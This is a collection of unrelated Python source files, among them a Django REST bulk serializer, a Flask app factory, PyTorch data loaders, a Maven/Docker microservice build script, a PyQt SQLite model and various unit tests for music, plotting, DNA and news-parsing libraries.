# since super by default strips out read-only fields
# hence id will no longer be present in validated_data
if all((isinstance(self.root, BulkListSerializer),
id_attr,
request_method in ('PUT', 'PATCH'))):
id_field = self.fields[id_attr]
id_value = id_field.get_value(data)
ret[id_attr] = id_value
return ret
class BulkListSerializer(ListSerializer):
update_lookup_field = 'id'
def update_or_create_instance(self, child, data, obj=None):
model_serializer = child.__class__(instance=obj, data=data,
context=self.context, partial=self.partial)
model_serializer.is_valid()
model_serializer.save()
return model_serializer.instance
def create(self, validated_data):
return [
self.update_or_create_instance(self.child, attrs)
for attrs in validated_data
]
def update(self, queryset, all_validated_data):
id_attr = getattr(self.child.Meta, 'update_lookup_field', 'id')
all_validated_data_by_id = {}
for i in all_validated_data:
key = i.get(id_attr)
if not (bool(key) and not inspect.isclass(key)):
raise ValidationError('')
all_validated_data_by_id[str(key)] = i
# since this method is given a queryset which can have many
# model instances, first find all objects to update
# and only then update the models
objects_to_update = queryset.filter(**{
'{}__in'.format(id_attr): list(all_validated_data_by_id.keys()),
})
if len(all_validated_data_by_id) != objects_to_update.count():
raise ValidationError('Could not find all objects to update.')
updated_objects = []
for obj in objects_to_update:
obj_id = str(getattr(obj, id_attr))
obj_validated_data = all_validated_data_by_id.get(obj_id)
# use model serializer to actually update the model
# in case that method is overwritten
updated_objects.append(
self.update_or_create_instance(self.child, obj_validated_data,
obj))
return updated_objects
def to_internal_value(self, data):
"""
List of dicts of native values <- List of dicts of primitive datatypes.
"""
if html.is_html_input(data):
data = html.parse_html_list(data, default=[])
if not isinstance(data, list):
message = self.error_messages['not_a_list'].format(
input_type=type(data).__name__
)
raise ValidationError({
api_settings.NON_FIELD_ERRORS_KEY: [message]
}, code='not_a_list')
if not self.allow_empty and len(data) == 0:
if self.parent and self.partial:
raise SkipField()
message = self.error_messages['empty']
raise ValidationError({
api_settings.NON_FIELD_ERRORS_KEY: [message]
}, code='empty')
ret = []
errors = []
for item in data:
try:
if self.instance:
try:
self.child.instance = self.instance.get(id=item['id'])
self.child.initial_data = item
except getattr(self.child.Meta.model, 'DoesNotExist') as exc:
raise ValidationError({'non_field_errors': [str(exc)]})
validated = self.child.run_validation(item)
except ValidationError as exc:
errors.append(exc.detail)
else:
ret.append(validated)
errors.append({})
if any(errors):
raise ValidationError(errors)
return ret
|
import logging
from logging.handlers import RotatingFileHandler
from flask import Flask, current_app
from . import settings
from .main import main
def create_app(settings_override=None):
# Create application.
app = Flask(
import_name=__name__,
static_folder=settings.STATIC_DIR,
template_folder=settings.TEMPLATES_DIR
)
# Load configuration.
app.config.from_object(settings)
app.config.from_object(settings_override)
# Register blueprints.
app.register_blueprint(main)
# Configure logging.
if not app.config['TESTING']:
configure_logging(app)
return app
def configure_logging(app):
# Create a file handler and set its level to DEBUG.
file_handler = RotatingFileHandler(
app.config['LOG_FILE'],
maxBytes=10000,
backupCount=7
)
file_handler.setLevel(logging.DEBUG)
# Create a log formatter and set it to the file handler.
format_str = '[%(asctime)s] {%(filename)s:%(lineno)d} %(levelname)s - %(message)s'
formatter = logging.Formatter(format_str, '%m-%d %H:%M:%S')
file_handler.setFormatter(formatter)
# Add the file handler to the logger.
app.logger.addHandler(file_handler)
# Set the logger's level to DEBUG.
app.logger.setLevel(logging.DEBUG)
def logger():
return current_app.logger
|
import random
import unittest
from numpy import random as np_random
from popgen import rhythm
class TestRhythm(unittest.TestCase):
def setUp(self):
self.rhythm = rhythm.Rhythm(120)
self.drum = self.rhythm.drum
def test_number_of_kicks_1(self):
random.seed(5)
assert self.rhythm.number_of_kicks() == 1
def test_number_of_kicks_2(self):
random.seed(3)
assert self.rhythm.number_of_kicks() == 2
def test_number_of_kicks_3(self):
random.seed(1)
assert self.rhythm.number_of_kicks() == 3
def test_generate_kicks(self):
random.seed(1)
np_random.seed(1)
kicks = (self.drum.bass_drum_1(), [(0, 4), (4, 4), (12, 8)])
assert self.rhythm.generate_kicks() == kicks
def test_generate_snares(self):
random.seed(1)
np_random.seed(1)
snares = (self.drum.acoustic_snare(), [(2, 8), (12, 4)])
assert self.rhythm.generate_snares() == snares
def test_generate_hihats(self):
random.seed(1)
np_random.seed(1)
hihats = (self.drum.pedal_hi_hat(), [(2, 8), (12, 4)])
assert self.rhythm.generate_hihats() == hihats
def test_generate_rides(self):
random.seed(1)
np_random.seed(1)
rides = (self.drum.ride_cymbal_1(), [(2, 8), (12, 4)])
assert self.rhythm.generate_rides() == rides
def test_generrate_bar(self):
random.seed(1)
np_random.seed(1)
bar = [[0.0, 4, [self.drum.bass_drum_1(), self.drum.pedal_hi_hat()]],
[0.0625, 16, None], [0.125, 16, None], [0.1875, 16, None],
[0.25, 4, [self.drum.bass_drum_1(), self.drum.ride_cymbal_1()]],
[0.3125, 16, None], [0.375, 16, None], [0.4375, 16, None],
[0.5, 4, [self.drum.acoustic_snare(), self.drum.ride_cymbal_1()]],
[0.5625, 16, None], [0.625, 16, None], [0.6875, 16, None],
[0.75, 8, [self.drum.bass_drum_1(), self.drum.pedal_hi_hat()]],
[0.8125, 16, None], [0.875, 16, None], [0.9375, 16, None]]
generated_bars = list(self.rhythm.generate_bar())
assert generated_bars == bar
|
import matplotlib.pyplot as plt
import matplotlib.patches as patches
from PIL import Image, ImageDraw, ImageFont
import numpy as np
import glob
import os
import sys
sys.path.insert(0,'..')
import intersection
width = 500
height = 500
rec_width = 200
rec_height = 300
first_x = 50
second_x = first_x + rec_width + 10
counter = 0
while second_x > first_x:
print(counter)
image = Image.new( 'RGB', ( width, height ) )
draw = ImageDraw.Draw(image)
draw.rectangle ((0,0,width,height), fill = (255,255,255) )
font = ImageFont.truetype("/usr/share/fonts/truetype/dejavu/DejaVuSans.ttf", 30)
IOU = round(intersection.IOU(first_x,100,rec_width,rec_height,second_x,100,rec_width,rec_height),3)
draw.text((first_x+rec_width/2,100+rec_height+10),"IOU="+str(IOU),fill=(0,0,0), font=font)
im = np.array( image )
# Create figure and axes
fig,ax = plt.subplots(1)
# Display the image
ax.imshow(im)
# Create a Rectangle patch
rect = patches.Rectangle((first_x,100),rec_width,rec_height,linewidth=1,edgecolor='r',facecolor='none')
# Add the patch to the Axes
ax.add_patch(rect)
rect = patches.Rectangle((second_x,100),rec_width,rec_height,linewidth=1,edgecolor='b',facecolor='none')
# Add the patch to the Axes
ax.add_patch(rect)
plt.axis('off')
plt.savefig('tmp'+str(counter).zfill(3))
plt.close()
second_x = second_x - 1
counter = counter + 1
fp_in = "tmp*.png"
fp_out = os.path.join("assets","iou_example.gif")
img, *imgs = [Image.open(f) for f in sorted(glob.glob(fp_in))]
img.save(fp=fp_out, format='GIF', append_images=imgs,save_all=True, duration=10, loop=0)
[os.remove(f) for f in sorted(glob.glob(fp_in))]
|
import os
from project import app, db
class BaseConfig:
"""Base configuration"""
TESTING = False
SQLALCHEMY_TRACK_MODIFICATIONS = False
print('Running through config')
class DevelopmentConfig(BaseConfig):
"""Development configuration"""
SQLALCHEMY_DATABASE_URI = os.environ.get('POSTGRES_URL')
MASTER_STATION = os.environ.get('MASTER_STATION')
MASTER_ELEVATOR = os.environ.get('MASTER_ELEVATOR')
MONGO_URI = os.environ.get('MONGO_URI')
MONGO_DBNAME = 'eva_dev'
class TestingConfig(BaseConfig):
"""Testing configuration"""
TESTING = True
SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_TEST_URL')
class ProductionConfig(BaseConfig):
"""Production configuration"""
SQLALCHEMY_DATABASE_URI = os.environ.get('DATABASE_URL')
|
import pytest
#from ..basevalidators import AngleValidator
from _plotly_utils.basevalidators import AngleValidator
import numpy as np
# Fixtures
# --------
@pytest.fixture()
def validator():
return AngleValidator('prop', 'parent')
# Tests
# -----
# ### Test acceptance ###
@pytest.mark.parametrize('val', [0] + list(np.linspace(-180, 179.99)))
def test_acceptance(val, validator):
assert validator.validate_coerce(val) == val
# ### Test coercion above 180 ###
@pytest.mark.parametrize('val,expected', [
(180, -180),
(181, -179),
(-180.25, 179.75),
(540, -180),
(-541, 179)
])
def test_coercion(val, expected, validator):
assert validator.validate_coerce(val) == expected
# ### Test rejection ###
@pytest.mark.parametrize('val',
['hello', (), [], [1, 2, 3], set(), '34'])
def test_rejection(val, validator):
with pytest.raises(ValueError) as validation_failure:
validator.validate_coerce(val)
assert 'Invalid value' in str(validation_failure.value)
|
import pytest
from hypothesis import given
from hypothesis.strategies import text
from pytest import approx
from squiggle import transform
def test_A():
assert (
transform("A", method="yau")
== transform("a", method="yau")
== ([0, 0.5], [0, -(3 ** 0.5) / 2])
)
def test_T():
assert (
transform("T", method="yau")
== transform("t", method="yau")
== ([0, 0.5], [0, (3 ** 0.5) / 2])
)
def test_G():
assert (
transform("G", method="yau")
== transform("g", method="yau")
== ([0, (3 ** 0.5) / 2], [0, -0.5])
)
def test_C():
assert (
transform("C", method="yau")
== transform("c", method="yau")
== ([0, (3 ** 0.5) / 2], [0, 0.5])
)
@given(text(alphabet="ATGC"))
def test_end_x_value(s):
assert transform(s, method="yau")[0][-1] == approx(
((3 ** 0.5) / 2 * (s.count("C") + s.count("G")))
+ (0.5 * (s.count("A") + s.count("T")))
)
@given(text(alphabet="ATGC"))
def test_end_y_value(s):
assert transform(s, method="yau")[1][-1] == approx(
(-(3 ** 0.5) / 2 * s.count("A"))
+ ((3 ** 0.5) / 2 * s.count("T"))
+ (0.5 * s.count("C"))
+ (-0.5 * s.count("G"))
)
def test_bad_seq():
with pytest.raises(ValueError):
transform("INVALID", method="yau")
|
"""
Inspired from APEX example at:
https://github.com/NVIDIA/apex/blob/master/examples/imagenet/main_amp.py#L256
and also from Timm loader at:
https://github.com/rwightman/pytorch-image-models/blob/master/timm/data/loader.py
"""
from types import SimpleNamespace
from typing import Callable, List, Optional, Any
import torch
from torch.utils.data import DataLoader
import torch.distributed as dist
import numpy as np
import random
from .enums import OutputFormat
def get_collate(image_format: OutputFormat,
label_format: OutputFormat,
other_fields_format: OutputFormat,
memory_format: torch.memory_format) -> Callable[[Any], SimpleNamespace]:
"""
Get the collate function.
Args:
image_format (OutputFormat): the output format for images.
label_format (OutputFormat): the output format for labels.
other_fields_format (OutputFormat): the output format for other fields.
memory_format (torch.memory_format): the data memory format for output
torch.Tensors.
Returns:
Callable, the collate function.
"""
return lambda batch: collate_function(batch,
image_format=image_format,
label_format=label_format,
other_fields_format=other_fields_format,
memory_format=memory_format)
def collate_function(batch: List[SimpleNamespace],
image_format: OutputFormat,
label_format: OutputFormat,
other_fields_format: OutputFormat,
memory_format: torch.memory_format) -> SimpleNamespace:
"""
NOTE: the collate function can covert types and shape of inputs following the
OutputFormats but it does not scales the values/range of tensors/arrays.
Since images inputs are uint8 the tensors/arrays will be in range [0, 255] even
if they are coverted to floats.
Args:
batch (list[SimpleNamespace]): the input batch.
image_format (OutputFormat): the output format for images.
label_format (OutputFormat): the output format for labels.
other_fields_format (OutputFormat): the output format for other fields.
memory_format (torch.memory_format): the data memory format for output
torch.Tensors.
Returns:
a SimpleNamespace with collated fields.
"""
# get keys of SimpleNamespace
keys = batch[0].__dict__.keys()
batch_size = len(batch)
collate_dict = {}
for k in keys:
# take the correct output format
if k == "image":
channels_first, dtype, to_tensor = image_format.value
elif k == "label":
channels_first, dtype, to_tensor = label_format.value
else:
channels_first, dtype, to_tensor = other_fields_format.value
first_value = batch[0].__dict__[k]
# CASE INT
if isinstance(first_value, int) or isinstance(first_value, np.integer):
if to_tensor:
out_value = torch.tensor([sample.__dict__[k] for sample in batch],
dtype=dtype)
else:
out_value = np.array([sample.__dict__[k] for sample in batch],
dtype=dtype)
# CASE NDARRAY
elif isinstance(first_value, np.ndarray):
values = [sample.__dict__[k] for sample in batch]
shape = values[0].shape
if len(shape) == 3 and channels_first:
new_shape = (batch_size, shape[2], shape[0], shape[1])
else:
new_shape = tuple([batch_size] + list(shape))
if to_tensor:
out_value = torch.zeros(new_shape, dtype=dtype) \
.contiguous(memory_format=memory_format)
else:
out_value = np.zeros(shape=new_shape, dtype=dtype)
for i, value in enumerate(values):
if len(shape) == 3 and channels_first:
value = np.rollaxis(value, 2)
if to_tensor:
value = torch.from_numpy(value).to(dtype)
out_value[i] += value
# OTHER TYPES
else:
msg = f"Collate of targets {type(first_value)} not implemented!"
raise NotImplementedError(msg)
collate_dict[k] = out_value
return SimpleNamespace(**collate_dict)
class CpuLoader:
def __init__(self,
loader: DataLoader,
image_format: OutputFormat,
image_mean: Optional[tuple] = None,
image_std: Optional[tuple] = None,
scale_image_floats: Optional[bool] = True):
"""
Args:
loader (torch.utils.data.Dataloader): the dataloader.
mean (tuple, optional): the mean to subtract (only to images).
std (tuple, optional): the std to divide (only to images).
rank (int, optional): the local rank (device).
"""
if "NCHW" not in image_format.name and "NHWC" not in image_format.name:
raise ValueError("Images should be in NCHW or NHWC format.")
if "TENSOR" not in image_format.name:
raise ValueError("Images should be Tensors for the CpuLoader.")
self.dtype = image_format.value[1]
assert self.dtype == torch.float16 or self.dtype == torch.float32, \
"OutputFormat for images should be float16 or float32!"
self.view = [1, 3, 1, 1] if "NCHW" in image_format.name else [1, 1, 1, 3]
# do we need to scale images?
self.scale = scale_image_floats
self.image_mean = image_mean
self.image_std = image_std
# do we need to normalize images?
self.normalize = self.image_mean is not None and self.image_std is not None
if self.scale:
if self.normalize:
self.image_mean = [x * 255. for x in self.image_mean]
self.image_std = [x * 255. for x in self.image_std]
else:
self.image_mean = [0., 0., 0.]
self.image_std = [255., 255., 255.]
# dataloader
self.dataloader = loader
self.sampler = loader.sampler
self.batch_sampler = loader.batch_sampler
self.dataset = loader.dataset
if self.scale or self.normalize:
self.image_mean = torch.tensor(self.image_mean).to(self.dtype)\
.view(self.view)
self.image_std = torch.tensor(self.image_std).to(self.dtype)\
.view(self.view)
def __iter__(self):
for batch in self.dataloader:
if self.normalize or self.scale:
batch.image = batch.image.to(self.dtype).sub_(self.image_mean)\
.div_(self.image_std)
else:
batch.image = batch.image.to(self.dtype)
yield batch
def __len__(self):
return len(self.loader)
class CudaLoader:
"""
A dataloader with prefatching that loads all data to gpu.
It can converts float32 to float16 and it can do the normalization operation.
"""
def __init__(self,
loader: DataLoader,
image_format: OutputFormat,
image_mean: Optional[tuple] = None,
image_std: Optional[tuple] = None,
scale_image_floats: Optional[bool] = True,
rank: Optional[int] = None):
"""
Args:
loader (torch.utils.data.Dataloader): the dataloader.
mean (tuple, optional): the mean to subtract (only to images).
std (tuple, optional): the std to divide (only to images).
rank (int, optional): the local rank (device).
"""
if "NCHW" not in image_format.name and "NHWC" not in image_format.name:
raise ValueError("Images should be in NCHW or NHWC format.")
if "TENSOR" not in image_format.name:
raise ValueError("Images should be Tensors for the CudaLoader.")
self.dtype = image_format.value[1]
assert self.dtype == torch.float16 or self.dtype == torch.float32, \
"OutputFormat for images should be float16 or float32!"
self.view = [1, 3, 1, 1] if "NCHW" in image_format.name else [1, 1, 1, 3]
# do we need to scale images?
self.scale = scale_image_floats
self.image_mean = image_mean
self.image_std = image_std
# do we need to normalize images?
self.normalize = self.image_mean is not None and self.image_std is not None
if self.scale:
if self.normalize:
self.image_mean = [x * 255. for x in self.image_mean]
self.image_std = [x * 255. for x in self.image_std]
else:
self.image_mean = [0., 0., 0.]
self.image_std = [255., 255., 255.]
# dataloader
self.dataloader = loader
self.sampler = loader.sampler
self.batch_sampler = loader.batch_sampler
self.dataset = loader.dataset
# local rank
self.rank = rank
# if None get local rank
if self.rank is None:
try:
self.rank = dist.get_rank()
except Exception:
self.rank = 0
# send std and mean to local rank
if self.scale or self.normalize:
self.image_mean = torch.tensor(self.image_mean).to(self.dtype)\
.to(self.rank).view(self.view)
self.image_std = torch.tensor(self.image_std).to(self.dtype)\
.to(self.rank).view(self.view)
def __iter__(self):
stream = torch.cuda.Stream(device=self.rank)
first = True
for batch in self.dataloader:
next_input_dict = {}
with torch.cuda.stream(stream):
for k in batch.__dict__.keys():
next_input = batch.__dict__[k]
next_input = next_input.to(self.rank, non_blocking=True)
if k == "image":
if self.normalize or self.scale:
next_input = next_input.to(self.dtype).sub_(self.image_mean)\
.div_(self.image_std)
else:
next_input = next_input.to(self.dtype)
next_input_dict[k] = next_input
if not first:
yield SimpleNamespace(**input_dict)
else:
first = False
torch.cuda.current_stream().wait_stream(stream)
input_dict = next_input_dict.copy()
yield SimpleNamespace(**input_dict)
def __len__(self):
return len(self.dataloader)
def _worker_init(worker_id, worker_seeding='all'):
worker_info = torch.utils.data.get_worker_info()
assert worker_info.id == worker_id
if isinstance(worker_seeding, Callable):
seed = worker_seeding(worker_info)
random.seed(seed)
torch.manual_seed(seed)
np.random.seed(seed % (2 ** 32 - 1))
else:
assert worker_seeding in ('all', 'part')
# random / torch seed already called in dataloader iter class w/
# worker_info.seed to reproduce some old results (same seed + hparam combo),
# partial seeding is required (skip numpy re-seed)
if worker_seeding == 'all':
np.random.seed(worker_info.seed % (2 ** 32 - 1))
|
#!/usr/bin/env python3
from os import cpu_count, getcwd, sched_setaffinity
from threading import Thread
from subprocess import Popen, DEVNULL, PIPE
# --------------------
# CONSTANTS
MAVEN = {
"CMD": ["./mvnw", "clean", "package", "-Dmaven.test.skip"],
"PROJECTS": [
["eureka", 8761, False],
["gateway", 8080, False],
["auth", 8081, False],
["users", 8082, True ],
["groups", 8083, True ],
["meetings", 8084, True ]
] # (service_name, service_port, needs_db)
}
DOCKER = {
"CMD": ["docker", "build", ".", "-f", "-"],
"TEMPLATES": {
"MAIN": """
FROM openjdk:17-alpine
COPY target/{service}-0.0.1.jar /app.jar
EXPOSE {port:d}
RUN adduser -D web && \\
chown web /app.jar && \\
chmod +x /app.jar
""",
"WITHOUT_DB": """
USER web
ENTRYPOINT ["java", "-jar", "/app.jar"]
""",
"WITH_DB": """
RUN echo -e "https://dl-cdn.alpinelinux.org/alpine/edge/main\\nhttps://dl-cdn.alpinelinux.org/alpine/edge/community" >> /etc/apk/repositories && \\
apk update && \\
apk add --no-cache postgresql14
USER postgres
RUN mkdir /var/lib/postgresql/data && \\
chmod 0700 /var/lib/postgresql/data && \\
initdb -D /var/lib/postgresql/data && \\
sed -r "s/unix_socket_directories\s*=\s*'.*?'/unix_socket_directories='\/tmp'/g" -i /var/lib/postgresql/data/postgresql.conf
USER root
RUN echo -e "su postgres -c 'pg_ctl start -D /var/lib/postgresql/data'\\nsu web -c 'java -jar /app.jar'" > /docker-entrypoint.sh && \\
chmod +x /docker-entrypoint.sh
ENTRYPOINT "/docker-entrypoint.sh"
"""
}
}
# --------------------
# FUNCTIONS
def build_microservice(service):
service_cwd = "{}/{}".format(getcwd(), service)
with Popen(MAVEN["CMD"], stdout=DEVNULL, stderr=DEVNULL, cwd=service_cwd, shell=False) as process:
print(f" ---->> Building '{service}' microservice jar...")
if process.wait() == 0:
print(f" ---->> Microservice jar '{service}' OK!")
return True
else:
print(f" ---->> Microservice jar '{service}' FAILED!")
return False
def build_dockerimage(service, port, db):
service_cwd = "{}/{}".format(getcwd(), service)
input_string = (DOCKER["TEMPLATES"]["MAIN"]).format(service = service, port = port)
input_string += DOCKER["TEMPLATES"]["WITH_DB"] if db is True else DOCKER["TEMPLATES"]["WITHOUT_DB"]
with Popen([*(DOCKER["CMD"]), "-t", f"brc/{service}:latest"], stdin=PIPE, stdout=DEVNULL, stderr=DEVNULL, cwd=service_cwd, shell=False) as process:
print(f" ---->> Building '{service}' docker image...")
process.communicate(str.encode(input_string))
if process.wait() == 0:
print(f" ---->> Docker image '{service}' OK!")
return True
else:
print(f" ---->> Docker image '{service}' FAILED!")
return False
def runnable(cpu_id, project):
sched_setaffinity(0, [ cpu_id ])
build_microservice(project[0]) and \
build_dockerimage(*project)
def main():
threads = []
host_cpus = cpu_count()
for idx, project in enumerate(MAVEN["PROJECTS"], start=0):
thread = Thread(target=runnable, args=[ (idx % host_cpus), project ])
threads.append(thread)
thread.start()
for thread in threads:
thread.join()
# --------------------
# MAIN
if __name__ == '__main__':
main()
|
from PyQt4 import QtGui
class CaseModel(QtGui.QStandardItemModel):
def __init__(self, parent, dbConnection):
super(CaseModel, self).__init__(parent)
self.dbCon = dbConnection
def populate(self):
cur = self.dbCon.cursor()
cur.execute("SELECT NAME FROM FCASE")
rows = cur.fetchall()
for row in rows:
item = QtGui.QStandardItem()
item.setEditable(False)
item.setText(row[0])
self.appendRow(item)
self.dbCon.commit()
def insertCase(self, name, description):
cur = self.dbCon.cursor()
cur.execute("INSERT INTO FCASE(NAME, DESCRIPTION) VALUES (?, ?)",
(str(name), str(description)))
self.dbCon.commit()
item = QtGui.QStandardItem()
item.setEditable(False)
item.setText(name)
self.appendRow(item)
def deleteCase(self, row, name):
cur = self.dbCon.cursor()
cur.execute("DELETE FROM FCASE WHERE NAME=?", (str(name),))
cur.execute("DELETE FROM IMAGE WHERE CASE_NAME=?", (str(name),))
cur.execute("SELECT NAME FROM MODULE")
rows = cur.fetchall()
all_modules = []
for r in rows:
all_modules.append(r[0])
for module in all_modules:
cur.execute("DELETE FROM " + module + "_MSG WHERE CASE_NAME=?", (str(name),))
self.dbCon.commit()
self.takeRow(row)
def fetchCaseDescription(self, name):
cur = self.dbCon.cursor()
cur.execute("SELECT DESCRIPTION FROM FCASE WHERE NAME = ?", (str(name),))
rows = cur.fetchall()
self.dbCon.commit()
return rows[0][0]
|
"""
@author: gsivaraman@anl.gov
"""
def plot_metric_write(train_size,err_list,r2_list, err_unscaled ,r2_unscaled , indlist, tag=None):
'''
Plot the metric/ write evolution history over the trial using this function
:param train_size: (list)
:param err_list: (list)
:param r2_list: (list)
:param err_unscaled : (list) Error rescaled to energy scale
:param r2_unscaled : (list)
:param indlist: (list)
:param tag: (str) String to tag to output file name
Return type: figure object
'''
import matplotlib.pyplot as plt
import matplotlib as mpl
import numpy as np
plt.rcParams["font.family"] = "Arial"
mpl.style.use('seaborn')
fig = plt.figure(figsize=(18.5,10.5),dpi=300)
ax1 = fig.add_subplot(211)
ax1.plot(train_size,err_list,'*--',color='r',lw=3.5)
ax1.set_ylabel('RMSE',fontsize=24)
ax1.set_xlabel('AL sample size',fontsize=24)
ax1.set_title("AL Evolution",fontsize=26)
ax1.tick_params(axis ='both', which ='major',
labelsize = 20)
ax1.tick_params(axis ='both', which ='minor', labelsize = 20)
ax1.set_ylim([min(err_list), max(err_list)])
ax1.set_xlim([train_size[0]-1, max(train_size)])
ax2 = fig.add_subplot(212)
ax2.plot(train_size,r2_list,'^--',color='g',lw=3.5)
ax2.set_ylabel(r'r$^{2}$',fontsize=24)
ax2.set_xlabel('AL sample size',fontsize=24)
ax2.tick_params(axis ='both', which ='major', labelsize = 20)
ax2.tick_params(axis ='both', which ='minor', labelsize = 20)
ax2.set_ylim([min(r2_list), max(r2_list)])
ax2.set_xlim([train_size[0]-1, max(train_size)])
plt.tight_layout()
plt.draw()
fig.savefig('AL.png',dpi=300)
xarray = np.array(train_size)
yarray = np.array(err_list)
zarray = np.array(r2_list)
array_err_unscaled = np.array(err_unscaled)
array_r2_unscaled = np.array(r2_unscaled)
indarray = np.array(indlist)
data = np.array([xarray, yarray, zarray, array_err_unscaled, array_r2_unscaled])
data = data.T
indexarray_path = "AL_train_Array.dat"
if tag == None:
datafile_path = "AL_history.dat"
elif tag != None:
datafile_path = "AL_history_{}.dat".format(tag)
with open(datafile_path, 'w+') as datafile_id:
np.savetxt(datafile_id, data, fmt=['%d','%f','%f','%f','%f'])
with open(indexarray_path, 'w+') as indexfile_id:
np.savetxt(indexfile_id, indarray, fmt=['%d'])
return fig
|
"""
蘋果日報分解測試
"""
# pylint: disable=duplicate-code
import unittest
import twnews.common
from twnews.soup import NewsSoup
#@unittest.skip
class TestAppleDaily(unittest.TestCase):
"""
蘋果日報分解測試
"""
def setUp(self):
self.dtf = '%Y-%m-%d %H:%M:%S'
def test_01_sample(self):
"""
測試蘋果日報樣本
"""
pkgdir = twnews.common.get_package_dir()
nsoup = NewsSoup(pkgdir + '/samples/appledaily.html.xz')
self.assertEqual('appledaily', nsoup.channel)
self.assertIn('和男友口角鎖門吞藥 女墜樓不治', nsoup.title())
self.assertEqual('2016-05-21 11:44:00', nsoup.date().strftime(self.dtf))
self.assertEqual('王煌忠', nsoup.author())
self.assertIn('文心路的一棟住宅大樓', nsoup.contents())
def test_02_mobile(self):
"""
測試蘋果日報行動版
"""
url = 'https://tw.news.appledaily.com/local/realtime/20181025/1453825'
nsoup = NewsSoup(url, refresh=True)
self.assertEqual('appledaily', nsoup.channel)
self.assertIn('男子疑久病厭世 學校圍牆上吊輕生亡', nsoup.title())
self.assertEqual('2018-10-25 12:03:00', nsoup.date().strftime(self.dtf))
self.assertEqual('江宏倫', nsoup.author())
self.assertIn('台北市北投區西安街二段', nsoup.contents())
def test_03_layouts(self):
"""
測試蘋果地產
"""
layouts = [
{
'url': 'http://home.appledaily.com.tw/article/index/20190313/38279127',
'title': '潮牌概念店撤離 東區房東陷定位危機',
'date': '2019-03-13 00:00:00',
'author': '唐家儀',
'contents': '英國人氣潮牌Superdry(超級乾燥)位大安區忠孝東路四段的形象概念門市竟已歇業'
}
]
for layout in layouts:
nsoup = NewsSoup(layout['url'], refresh=True, proxy_first=True)
self.assertEqual('appledaily', nsoup.channel)
self.assertIn(layout['title'], nsoup.title())
if nsoup.date() is not None:
self.assertEqual(layout['date'], nsoup.date().strftime(self.dtf))
else:
self.assertEqual(layout['date'], nsoup.date())
self.assertEqual(layout['author'], nsoup.author())
self.assertIn(layout['contents'], nsoup.contents())
|
"""
Configures pytest
"""
import pytest
from snakeskin.protos.common.common_pb2 import (
BlockHeader,
BlockData,
BlockMetadata,
Block
)
from snakeskin.models.block import RawBlock
from snakeskin.models.transaction import DecodedTX
from snakeskin.models import User
@pytest.fixture()
def raw_block():
""" Raw block """
yield RawBlock(
header=BlockHeader(
number=5,
previous_hash=b'12345',
data_hash=b'234567'
),
data=BlockData(
data=[b'']
),
metadata=BlockMetadata(
metadata=[b'']
)
)
@pytest.fixture()
def genesis_block():
""" A genesis block """
with open('network-config/genesis.block', 'rb') as gen_bytes:
gen_block = RawBlock.from_proto(Block.FromString(gen_bytes.read()))
yield gen_block
@pytest.fixture()
def channel_tx():
""" A channel transaction, generated from configtxgen, decoded """
with open('network-config/channel.tx', 'rb') as chan_bytes:
trans = DecodedTX.decode(chan_bytes.read())
yield trans
@pytest.fixture(scope='function')
def org1_user():
""" User with Org1 MSP """
yield User(
name='Org1User',
msp_id='Org1MSP',
cert_path=(
'network-config/crypto/peerOrganizations/org1.com/users/'
'Admin@org1.com/msp/signcerts/Admin@org1.com-cert.pem'
),
key_path=(
'network-config/crypto/peerOrganizations/org1.com/users/'
'Admin@org1.com/msp/keystore/'
'09ac257cbf389db23b05c93f2acdb94093d8397884d19ca8e6e40a515c1ab34a'
'_sk'
)
)
|
#!/usr/bin/python3 -m unittest
#
# test for devdax and hstore
#
# first run ...
# DAX_RESET=1 python3 ~/mcas/src/python/pymm/testing/devdax.py
#
# then re-run ..(as many times as you want, vars will increment)
#
# python3 ~/mcas/src/python/pymm/testing/devdax.py
#
import os
import unittest
import pymm
import numpy as np
def colored(r, g, b, text):
return "\033[38;2;{};{};{}m{} \033[38;2;255;255;255m".format(r, g, b, text)
def log(*args):
print(colored(0,255,255,*args))
class TestDevDaxSupport(unittest.TestCase):
def setUp(self):
self.s = pymm.shelf('myShelf',size_mb=1024,backend='hstore-cc',pmem_path='/dev/dax1.0',force_new=True)
print(self.s.items)
def tearDown(self):
del self.s
def test_check_content(self):
if 'x' in self.s.items:
log('x is there: value={}'.format(self.s.x))
self.s.x += 1.1
else:
log('x is not there!')
self.s.x = 1.0
if 'y' in self.s.items:
log('y is there:')
log(self.s.y)
self.s.y += 1
else:
log('y is not there!')
self.s.y = pymm.ndarray((10,10,),dtype=np.uint32)
self.s.y.fill(0)
print(self.s.items)
if __name__ == '__main__':
if os.path.isdir('/dev/dax1.0'):
unittest.main()
else:
print('Omitting test; no /dev/dax1.0 detected')
|
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('viewwork', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='menu',
options={'permissions': [('view_full_access', 'View full access'), ('view_read_only', 'View read only')], 'verbose_name': 'Menu item', 'verbose_name_plural': 'Menu items'},
),
]
|
from django.contrib import admin
from .models import Language,Framework,Project,Academic,Profile
# Register your models here.
admin.site.register(Language)
admin.site.register(Framework)
admin.site.register(Project)
admin.site.register(Academic)
admin.site.register(Profile)
|
# -*- coding: utf-8 -*-
import numpy as np
from matplotlib import pyplot as plt
from shapely.geometry import Polygon
from shapely.geometry import LineString
import logging
from .alignSource import alignSource
from .alignDest import alignDest
from .types import alignType
from .types import transformationType
from .transform import transform
from ..utils.roi import cliproi
from ..utils import instance
logger = logging.getLogger(__name__)
class align(object):
"""
Allows for the alignment of several stacks based on one stack.
"Alignment" is the process of determining a transformation between
two images that should represent the same thing but transformed/deformed.
"""
def __init__(
self,
source,
sourcelist,
dest,
destlist,
extension,
stackdim=None,
overwrite=False,
cval=np.nan,
plot=False,
transfotype=transformationType.translation,
):
""""""
# Data IO
self.source = alignSource(source, sourcelist, stackdim=stackdim)
self.dest = alignDest(
dest,
destlist,
extension,
stackdim=self.source.stackdim,
overwrite=overwrite,
)
# Missing data
self.cval = cval
# Transformation settings (set before actual transformation)
try:
one = self.source.dtype.type(1)
except AttributeError:
one = self.source.dtype(1)
self.dtype = (np.float32(1) * one).dtype.type
self.alignonraw = True
self.usekernel = False # Doesn't work well for Elastix!
self.pre_align = {"roi": None, "func": None}
self.pre_transform = {"pad": False}
self.post_transform = {"crop": False}
self.pre_transform_requested = {"pad": False}
self.post_transform_requested = {"crop": False}
self.extend = ((0, 0), (0, 0)) # negative: crop, positive: pad
# Transformation (change of frame matrices, not change of coordinates!)
self.transfotype = transfotype
